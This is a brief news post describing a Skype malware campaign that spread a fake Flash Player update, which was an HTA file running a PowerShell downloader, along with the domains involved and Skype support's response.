A few days ago many Skype users have noticed that they’ve received a malicious malware message containing a fake Flash Player update link. This issue has been reported by several users on social platforms such as Reddit, Twitter or Facebook.
The guys from Bleeping Computers have taken at look at the infected file and they’ve found out that it contains a malicious javascript code. In other words, the so-called Flash Player Update was actually a HTML application file (HTA) and it was developed to execute a PowerShell script to download a payload to your computer.
Once the payload was installed on your computer, it could be JSE (encrypted JavaScript), but since the domain on where the scam was being hosted was down, a copy of the final payload cold not be retrieved. However, the file was most likely going to install a Trojan to the computer.
There are two domains that were spreading this virus and they go by the name of oyomakaomojiya and cievubeataporn. According to Bleeping Computers, these domains have been registered with “cock.li” email account. The company has also mentioned that these email accounts were also used to register many other strange domains, which are probably hosting the same infected file. The IP addresses that are hosting the websites were also previously under the radar for some similar kind of strange domains.
This means that the domains have been registered specifically for spreading malware on the internet and that a group of hackers are behind this operation. What’s strange is that the person that has found the malware has contacted Skype support to inform them about the issue. Skype support has refused to take the responsibility, which is quite strange as this is not the first time when the application is used to spread out this type of malware.
Leave a Reply